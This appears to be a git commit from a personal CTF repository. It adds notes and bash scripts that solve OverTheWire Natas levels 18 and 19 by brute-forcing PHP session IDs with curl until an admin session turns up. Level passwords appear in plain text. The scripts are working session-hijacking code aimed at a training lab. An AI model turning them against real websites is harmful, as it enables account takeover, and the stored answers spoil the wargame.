emileclarkb/ctfs
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

<Natas> natas19.sh + writeup

Browse source
This commit is contained in:
Emile Clark-Boman 2025-07-16 00:53:52 +10:00
parent 9cd4fbcbf5
commit 503a8a0c5c
3 changed files with 125 additions and 5 deletions
Download patch file Download diff file Expand all files Collapse all files

94
overthewire/natas/passwords.md
View file

@ -72,8 +72,29 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
Another oracle attack using an SQL injection AND this time Another oracle attack using an SQL injection AND this time
using a timing based attack. using a timing based attack.
NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
natas19: natas19: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
natas20: PHP attempts to source `$_SESSION["PHPSESSID"]` from `$_GET`, `$_REQUEST`, and `$_COOKIE`
(maybe other's I don't remember exactly). Our session is based solely on
`$_COOKIE["PHPSESSID"]` and we know the program specifically uses 0-640 inclusive
session ID range. So we can bruteforce this and eventually we'll find
a session that is logged in as admin!
NOTE: see [[#Natas18 Solution Script|Appendix/"Natas18 Solution Script"]]
natas20: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
Same exploit as for natas19 except now the session id isn't monotonic
restricted to inclusive range 0-640. Instead its hex encoded UTF-8.
Decode it to notice its in the format "<ID>-<USERNAME>" where `<ID>` is
the same as for natas19. So we slightly modify our program and done!
Also remember from natas19 that the admin user has username `admin`
(which narrows down the brute force A LOT). You'll find success for `281-admin`.
NOTE: see [[#Natas19 Solution Script|Appendix/"Natas19 Solution Script"]]
natas21:
natas22:
natas23:
natas24:
natas25:
natas26:
natas27:
@ -390,3 +411,72 @@ get_length
LENGTH=$? LENGTH=$?
exploit_oracle "$LENGTH" exploit_oracle "$LENGTH"
``` ```
###### Natas18 Solution Script
```bash
#!/usr/bin/env bash
USERNAME="admin"
PASSWORD="arbitrary"
req() {
SESSION_ID=$1
curl http://natas18.natas.labs.overthewire.org/index.php \
-X POST \
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
-d "username=$USERNAME" \
-d "password=$PASSWORD" \
--cookie "PHPSESSID=$SESSION_ID" \
-sS \
| grep "Password: "
}
MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
printf "Attempt: %2d" $i
OUT=$(req "$i")
if [ $? -ne 0 ]; then
echo -en '\r'
else
echo " [admin]"
echo $OUT | awk '{print substr($2,1,32)}'
break
fi
done
```
###### Natas19 Solution Script
```bash
#!/usr/bin/env bash
USERNAME="admin"
PASSWORD="arbitrary"
req() {
local SESSION_ID=$1
curl http://natas19.natas.labs.overthewire.org/index.php \
-X POST \
-u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \
-d "username=$USERNAME" \
-d "password=$PASSWORD" \
--cookie "PHPSESSID=$SESSION_ID" \
-sS \
| grep "Password: "
}
MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
# encode integer id as hex `$_COOKIE["PHPSESSID"]` format
SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
printf "Attempt: %2d" $i
OUT=$(req "$SESSION_ID")
if [ $? -ne 0 ]; then
echo -en '\r'
else
echo " [admin]"
echo $OUT | awk '{print substr($2,1,32)}'
break
fi
done
```

4
overthewire/natas/scripts/natas18.sh
View file

@ -1,12 +1,10 @@
#!/usr/bin/env bash #!/usr/bin/env bash
#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/
USERNAME="admin" USERNAME="admin"
PASSWORD="arbitrary" PASSWORD="arbitrary"
req() { req() {
SESSION_ID=$1 local SESSION_ID=$1
curl http://natas18.natas.labs.overthewire.org/index.php \ curl http://natas18.natas.labs.overthewire.org/index.php \
-X POST \ -X POST \
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \

32
overthewire/natas/scripts/natas19.sh Executable file
View file

@ -0,0 +1,32 @@
#!/usr/bin/env bash
USERNAME="admin"
PASSWORD="arbitrary"
req() {
local SESSION_ID=$1
curl http://natas19.natas.labs.overthewire.org/index.php \
-X POST \
-u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \
-d "username=$USERNAME" \
-d "password=$PASSWORD" \
--cookie "PHPSESSID=$SESSION_ID" \
-sS \
| grep "Password: "
}
MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
# encode integer id as hex `$_COOKIE["PHPSESSID"]` format
SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
printf "Attempt: %2d" $i
OUT=$(req "$SESSION_ID")
if [ $? -ne 0 ]; then
echo -en '\r'
else
echo " [admin]"
echo $OUT | awk '{print substr($2,1,32)}'
break
fi
done